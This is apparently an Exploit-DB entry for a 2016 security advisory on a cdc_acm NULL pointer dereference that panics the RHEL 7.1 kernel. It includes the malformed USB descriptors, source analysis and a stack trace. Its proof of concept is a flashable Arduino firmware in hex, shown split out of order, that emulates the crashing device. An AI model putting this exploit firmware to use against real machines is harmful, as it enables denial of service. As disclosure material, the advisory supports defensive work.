:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:1014240000000040B4040055000101020301090258
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
--

624
platforms/linux/dos/39543.txt Executable file
View file

@ -0,0 +1,624 @@
OS-S Security Advisory 2016-06
Linux cdc_acm Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (cdc_acm driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-06_cdc_acm.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the cdc_acm driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x482
idProduct: 0x203
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
This is the configuration descriptor containing only one interface descriptor.
The cdc-acm driver assumes that there will be at least two interface-
descriptors with associated endpoint-descriptors.
Since the cdc-acm driver is expecting a second interface descriptor, the
driver tries to dereference a null-pointer.
This results in a crash of the system.
****
$ nm cdc-acm.ko.debug | grep acm_probe
0000000000001530 t acm_probe
$ addr2line -e cdc-acm.ko.debug 0x179C
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/class/cdc-
acm.c:1229
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/class/cdc-acm.c)
...
1093 /* handle quirks deadly to normal probing*/
1094 if (quirks == NO_UNION_NORMAL) {
1095 data_interface = usb_ifnum_to_if(usb_dev, 1); /* possible null-
pointer */
1096 control_interface = usb_ifnum_to_if(usb_dev, 0);
1097 goto skip_normal_probe;
1098 }
...
1226 skip_normal_probe:
1227
1228 /*workaround for switched interfaces */
1229 if (data_interface->cur_altsetting->desc.bInterfaceClass /* null-
pointer dereference */
1230 != CDC_DATA_INTERFACE_TYPE) {
1231 if (control_interface->cur_altsetting->desc.bInterfaceC
...
****
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x0
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283366
Kernel Stacktrace:
[ 32.550821] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 32.765575] usb 1-1: New USB device found, idVendor=0482, idProduct=0203
[ 32.775042] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 32.780788] usb 1-1: Product: Ä?
[ 32.783389] usb 1-1: Manufacturer: Ä?
[ 32.786534] usb 1-1: SerialNumber: %
[ 32.794914] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 32.850587] BUG: unable to handle kernel NULL pointer dereference at
0000000000000008
[ 32.851028] IP: [<ffffffffa039479c>] acm_probe+0x26c/0x11d0 [cdc_acm]
[ 32.851028] PGD 0
[ 32.851028] Oops: 0000 [#1] SMP
[ 32.851028] Modules linked in: cdc_acm(+) ip6t_rpfilter ip6t_REJECT
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 32.851028] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 32.851028] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 32.851028] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 32.851028] RIP: 0010:[<ffffffffa039479c>] [<ffffffffa039479c>]
acm_probe+0x26c/0x11d0 [cdc_acm]
[ 32.851028] RSP: 0018:ffff88000bd23b40 EFLAGS: 00010246
[ 32.851028] RAX: ffff88000c525800 RBX: 0000000000000000 RCX: ffff88000bd23fd8
[ 32.851028] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88000c524c00
[ 32.851028] RBP: ffff88000bd23bd8 R08: 0000000000000001 R09: 0000000000000000
[ 32.851028] R10: 0000000000002cad R11: ffffffff810020d8 R12: ffff88000c525800
[ 32.851028] R13: ffff88000f508692 R14: 0000000000000001 R15: ffff88000bcd0000
[ 32.851028] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 32.851028] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 32.851028] CR2: 0000000000000008 CR3: 000000000cb87000 CR4:
00000000000006f0
[ 32.851028] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 32.851028] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 32.851028] Stack:
[ 32.851028] ffff88000bd23ba8 ffff88000d6b3690 ffff88000bd23ba8 00000000436261cb
[ 32.851028] ffff88000bcd0090 0000000000000004 ffff88000bcd0090
0000000000000202
[ 32.851028] 0000001000000001 0000000000000200 0000000000000000
ffff88000bd23bd8
[ 32.851028] Call Trace:
[ 32.851028] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 32.851028] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 32.851028] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 32.851028] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 32.851028] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 32.851028] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 32.851028] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 32.851028] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 32.851028] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 32.851028] [<ffffffffa039d000>] ? 0xffffffffa039cfff
[ 32.851028] [<ffffffffa039d0ba>] acm_init+0xba/0x1000 [cdc_acm]
[ 32.851028] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 32.851028] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 32.851028] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 32.851028] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 32.851028] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 32.851028] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 32.851028] Code: 5f 5d c3 0f 1f 40 00 48 83 7d d0 00 74 d4 44 39 6d c0 74
0d f6 05 66 4e 00 00 04 0f 85 0f 0e 00 00 48 39 5d d0 0f 84 ea 06 00 00 <48>
8b 43 08 80 78 05 0a 0f 84 fe 00 00 00 48 8b 45 d0 48 8b 40
[ 32.851028] RIP [<ffffffffa039479c>] acm_probe+0x26c/0x11d0 [cdc_acm]
[ 32.851028] RSP <ffff88000bd23b40>
[ 32.851028] CR2: 0000000000000008
[ 33.230701] ---[ end trace b239663354a1c556 ]---
[ 33.237071] Kernel panic - not syncing: Fatal exception
[ 33.238044] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
